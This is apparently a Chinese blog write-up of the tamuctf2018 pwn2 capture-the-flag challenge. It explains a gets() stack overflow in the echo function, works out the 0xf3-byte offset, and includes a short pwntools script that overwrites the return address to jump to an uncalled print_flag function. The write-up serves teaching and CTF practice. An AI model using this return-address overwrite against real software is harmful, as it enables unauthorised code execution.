美文网首页
tamuctf2018_pwn2

tamuctf2018_pwn2

作者: chenmuxin | 来源:发表于2018-12-05 12:25 被阅读0次

    思路

    • 看函数列表有print_flag函数,但阅读可知该函数没有被调用


      print-flag.png
    • 从主函数开始看,到echo函数,看到gets,我们便可以知道了在gets溢出。


      echo.png

    -已经有构造好的print_flag,因此我们只需要将gets函数的ret覆盖,使其指向print_flag的函数的地址。计算可以知道我们需要覆盖0xf3大小的空间,且print_flag函数地址为0x0804854b


    s的起始.png
    ret.png

    代码

    from pwn import*
    
    context.log_level='debug'
    io = process('./pwn2')
    
    payload='\x90'*0xf3
    payload += p32(0x0804854B)
    
    io.recvuntil('I bet I can repeat anything you tell me!\n')
    io.sendline(payload) 
    io.interactive()
    

    相关文章

      网友评论

          本文标题:tamuctf2018_pwn2

          本文链接:https://www.haomeiwen.com/subject/zusoqqtx.html